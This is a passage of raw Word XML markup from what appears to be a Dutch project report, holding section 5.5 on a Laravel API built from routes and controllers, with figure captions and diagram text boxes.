        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41B777" w14:textId="2B1AC579" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00EB3DC5">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253092864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616FD4D4" wp14:editId="20531744">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="763" name="Rectangle 76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B4544" id="Rectangle 763" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1in;margin-top:-72.15pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328298B" w14:textId="0E9C86E1" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CEA71E" w14:textId="5AEE3786" w:rsidR="00677E26" w:rsidRDefault="00512B06" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253090816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="361ED3BA" wp14:editId="5BB1EB00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>368300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3665855"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>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rapport e-mail.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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDF9C6" w14:textId="4047E8B9" w:rsidR="00677E26" w:rsidRDefault="00512B06" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253224960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77CCBAE3" wp14:editId="25BC104A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3830955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="822" name="Text Box 822"/>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3FB16" w14:textId="29314A18" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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CBAE3" id="Text Box 822" o:spid="_x0000_s1222" type="#_x0000_t202" style="position:absolute;margin-left:-.85pt;margin-top:301.65pt;width:100pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0873FB16" w14:textId="29314A18" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.16</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A787A5" w14:textId="710AA424" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00677E26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE751C" w14:textId="6C65E418" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00256686"/>
    <w:p w14:paraId="6C8BF649" w14:textId="77777777" w:rsidR="00C26333" w:rsidRDefault="002C64EE" w:rsidP="00256686">
      <w:pPr>
        <w:sectPr w:rsidR="00C26333" w:rsidSect="00512B06">
          <w:headerReference w:type="default" r:id="rId105"/>
          <w:headerReference w:type="first" r:id="rId106"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E9FB5" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00256686"/>
    <w:p w14:paraId="5F087820" w14:textId="4111BC00" w:rsidR="00C26333" w:rsidRDefault="00AB5D38" w:rsidP="00256686">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253095936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0584C17B" wp14:editId="34DED615">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-915222</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-912644</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="815" name="Rectangle 81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BA251" id="Rectangle 815" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.05pt;margin-top:-71.8pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D2428" w14:textId="12BA4CEB" w:rsidR="00C26333" w:rsidRDefault="00557C84" w:rsidP="008B186E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidR="008B186E">
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFEC8E" w14:textId="2361EF2A" w:rsidR="008B186E" w:rsidRDefault="00735EAA" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253099008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F976DC" wp14:editId="487B1AE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>42545</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>251460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="1024255"/>
                <wp:effectExtent l="0" t="0" r="25400" b="17145"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="818" name="Text Box 818"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="102425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92FF00C" w14:textId="3215D320" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r w:rsidRPr="00170467">
                              <w:t>Voor de API gebruik ik de Routing functionaliteiten van Laravel.</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> Een Route is een URI die een specifieke functie uitvoert zoals de HTTP POST </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                              </w:rPr>
                              <w:t xml:space="preserve">/register </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>bedoeld is om gebruikers te registreren</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">. De routes worden opgeslagen in routes.php. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17F34899" w14:textId="3F1905EE" w:rsidR="002A05E5" w:rsidRPr="00170467" w:rsidRDefault="002A05E5">
                            <w:r w:rsidRPr="00170467">
                              <w:t xml:space="preserve">De API is opgebouwd uit Routes en Controllers en is operationeel op de Artisan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976DC" id="Text Box 818" o:spid="_x0000_s1223" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.35pt;margin-top:19.8pt;width:460pt;height:80.65pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="792FF00C" w14:textId="3215D320" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r w:rsidRPr="00170467">
                        <w:t>Voor de API gebruik ik de Routing functionaliteiten van Laravel.</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> Een Route is een URI die een specifieke functie uitvoert zoals de HTTP POST </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                        </w:rPr>
                        <w:t xml:space="preserve">/register </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>bedoeld is om gebruikers te registreren</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">. De routes worden opgeslagen in routes.php. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17F34899" w14:textId="3F1905EE" w:rsidR="002A05E5" w:rsidRPr="00170467" w:rsidRDefault="002A05E5">
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve">De API is opgebouwd uit Routes en Controllers en is operationeel op de Artisan server. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF2184" w14:textId="0B09D5C3" w:rsidR="00AB5D38" w:rsidRDefault="00F03C4F" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253225984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BAFDDDF" wp14:editId="2A124C66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4053205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1206500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="823" name="Text Box 823"/>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7A2CB" w14:textId="4DC1840C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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FDDDF" id="Text Box 823" o:spid="_x0000_s1224" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:319.15pt;width:95pt;height:27pt;z-index:2532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6H3oCAABm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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AE7A2CB" w14:textId="4DC1840C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.17</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00787B87">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253101056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A1BE781" wp14:editId="6382A5E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2384425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1317625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1203960" cy="457200"/>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12039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0B0B6" w14:textId="0C52BFC4" w:rsidR="002A05E5" w:rsidRPr="00090D9E" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="F7CAAC" w:themeColor="accent2" w:themeTint="66"/>
                                <w:sz w:val="52"/>
                                <w:lang w:val="en-US"/>
                                <w14:textOutline w14:w="22225" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
                                  <w14:solidFill>
                                    <w14:schemeClr w14:val="accent2"/>
                                  </w14:solidFill>
                                  <w14:prstDash w14:val="solid"/>
                                  <w14:round/>
                                </w14:textOutline>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00090D9E">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="F7CAAC" w:themeColor="accent2" w:themeTint="66"/>
                                <w:sz w:val="52"/>
                                <w:lang w:val="en-US"/>
                                <w14:textOutline w14:w="22225" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
                                  <w14:solidFill>
                                    <w14:schemeClr w14:val="accent2"/>
                                  </w14:solidFill>
                                  <w14:prstDash w14:val="solid"/>
                                  <w14:round/>
                                </w14:textOutline>
                              </w:rPr>
                              <w:t>Ar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BE781" id="Text Box 590" o:spid="_x0000_s1225" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:187.75pt;margin-top:103.75pt;width:94.8pt;height:36pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="27C0B0B6" w14:textId="0C52BFC4" w:rsidR="002A05E5" w:rsidRPr="00090D9E" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="F7CAAC" w:themeColor="accent2" w:themeTint="66"/>
                          <w:sz w:val="52"/>
                          <w:lang w:val="en-US"/>
                          <w14:textOutline w14:w="22225" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
                            <w14:solidFill>
                              <w14:schemeClr w14:val="accent2"/>
                            </w14:solidFill>
                            <w14:prstDash w14:val="solid"/>
                            <w14:round/>
                          </w14:textOutline>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00090D9E">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="F7CAAC" w:themeColor="accent2" w:themeTint="66"/>
                          <w:sz w:val="52"/>
                          <w:lang w:val="en-US"/>
                          <w14:textOutline w14:w="22225" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
                            <w14:solidFill>
                              <w14:schemeClr w14:val="accent2"/>
                            </w14:solidFill>
                            <w14:prstDash w14:val="solid"/>
                            <w14:round/>
                          </w14:textOutline>
                        </w:rPr>
                        <w:t>Artisan</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BD1C12">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253106176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FA515E2" wp14:editId="32494764">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2002790</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3031490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2095500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="633" name="Text Box 633"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2095500" cy="342900"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5">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DF0E416" w14:textId="32D126F1" w:rsidR="002A05E5" w:rsidRPr="00B86D2F" w:rsidRDefault="002A05E5" w:rsidP="00A803AF">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B86D2F">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>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515E2" id="Text Box 633" o:spid="_x0000_s1226" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:157.7pt;margin-top:238.7pt;width:165pt;height:27pt;z-index:2531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" fillcolor="#bdd6ee [1304]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DF0E416" w14:textId="32D126F1" w:rsidR="002A05E5" w:rsidRPr="00B86D2F" w:rsidRDefault="002A05E5" w:rsidP="00A803AF">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B86D2F">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Functies</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DA4A17">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253104128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10292BC0" wp14:editId="7429E0D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>673100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2000885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4690745" cy="1826895"/>
                <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="622" name="Text Box 622"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4690745" cy="1826895"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent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59023A" w14:textId="1DD31DDC" w:rsidR="002A05E5" w:rsidRPr="00EC73E2" w:rsidRDefault="002A05E5" w:rsidP="001B662D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EC73E2">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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2BC0" id="Text Box 622" o:spid="_x0000_s1227" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:53pt;margin-top:157.55pt;width:369.35pt;height:143.8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" fillcolor="#ed7d31 [3205]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D59023A" w14:textId="1DD31DDC" w:rsidR="002A05E5" w:rsidRPr="00EC73E2" w:rsidRDefault="002A05E5" w:rsidP="001B662D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EC73E2">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Routes</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0097494F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253105152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="074A7CF1" wp14:editId="155CB138">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>736600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2689225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4567555" cy="909955"/>
                <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="632" name="Text Box 632"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4567555" cy="909955"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0">
                          <a:schemeClr val="accent1"/>
                        </a:lnRef>
                        <a:fillRef idx="0">
                          <a:schemeClr val="accent1"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:schemeClr val="accent1"/>
                        </a:effectRef>
                        <a:fontRef idx="minor">
                          <a:schemeClr val="dk1"/>
                        </a:fontRef>
                      </wps:style>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="77C6C265" w14:textId="2E00DBD1" w:rsidR="002A05E5" w:rsidRPr="00EC73E2" w:rsidRDefault="002A05E5" w:rsidP="007376A4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EC73E2">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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7CF1" id="Text Box 632" o:spid="_x0000_s1228" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58pt;margin-top:211.75pt;width:359.65pt;height:71.6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" fillcolor="#5b9bd5 [3208]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77C6C265" w14:textId="2E00DBD1" w:rsidR="002A05E5" w:rsidRPr="00EC73E2" w:rsidRDefault="002A05E5" w:rsidP="007376A4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EC73E2">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Controllers</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0097494F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669477" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20FE99A4" wp14:editId="1C9C8013">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>34925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1198880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="2858135"/>
                <wp:effectExtent l="0" t="0" r="38100" b="37465"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21691"/>
                    <wp:lineTo x="21646" y="21691"/>
                    <wp:lineTo x="21646" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="589" name="Rectangle 589"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905500" cy="28581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A2478" id="Rectangle 589" o:spid="_x0000_s1026" style="position:absolute;margin-left:2.75pt;margin-top:94.4pt;width:465pt;height:225.05pt;z-index:2516694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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0004584F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
